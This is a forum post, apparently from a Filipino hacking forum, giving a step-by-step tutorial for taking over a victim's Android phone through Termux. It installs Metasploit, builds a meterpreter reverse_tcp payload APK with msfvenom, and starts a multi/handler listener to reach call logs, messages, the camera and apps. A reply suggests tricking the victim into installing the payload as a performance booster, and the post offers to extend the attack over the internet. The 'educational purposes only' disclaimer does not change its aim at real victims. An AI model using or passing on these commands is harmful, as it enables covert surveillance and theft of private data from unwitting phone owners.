What's new

Tutorial häçk ANDROID PHONE USING TERMUX APP

Mushifans

Forum Veteran
Joined
May 27, 2018
Posts
1,761
Solutions
8
Reaction
1,691
Points
584
häçkING ANDROID PHONE USING TERMUX APP

Eto mga pede nyong magawa
  • call logs
  • text messages
  • send text message
  • install , uninstall and run app
  • can access phone camera
And many more

Sundin lang lahat ng steps para magawa nyo ng maayos

1. Una download kayo ng "Termux" app sa playstore

2. After nyo madownload open nyo yung app then type this command one by one

  • apt update
  • apt upgrade
  • pkg install unstable-repo
  • pkg install metasploit

3. Type nyo lng "Y" pag may lumabas na do you want to install

4. Wait nyo matapos medyo matagal talaga mag install

5. After ma-install gagawa na tayo ng payload or yung app na iinstall natin sa target para ma access natin yung phone nya type nyo lang tong command na ito

- msfvenom -p android/meterpreter/reverse_tcp LHOST=(lagay nyo dito ip address nyo) LPORT=4444 R > /sdcard/payload.apk(kahit anong name gusto nyo)

-> para malaman nyo ip nyo open new terminal to do it just swipe the left side of the screen then new session then type ifconfig then enter see the screenshot for reference

6. Then ngayon Punta ulit tayo sa termux iseset-up naman natin device natin para magkaroon na tayo ng access sa target device

7. Type msfconsole wait nyo lng then after mag load type nyo naman tong command na ito one by one

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST (IP nyo)
  • set LPORT 4444
  • exploit

8. After nyan pede na natin iinstall ung payload sa target nating phone kayo na bahala kung paano nyo ma iinstall yan sa phone ng target nyo

9. Once na iopen nya ung app makikita nyo sa terminal nyo is (meterpreter) it means connected na tayo sa target natin type nyo lang help para makita nyo ung mga command na pwede nyong gamitin :) :)
NOTE: This procedure only works if you and your victim is on the same network
DISCLAIMER: this is for educational purposes only
CREDIT to the maker of Metasploit

PLSS SEE SCREENSHOT


IF YOU WANT TO ACCESS VICTIMS DEVICE OVER WAN OR ON DIFFERENT INTERNET CONNECTION OR LOCATION VISIT MY OTHER THREAD THANK YOU

https://phcorner.net/threads/port-forwarding-using-portmap.894254/
 

Attachments

Last edited:
Trick them that this app is usefull or can improved the performanced of his/her device , but not all will bite this trick hehe
 

Similar threads

Back
Top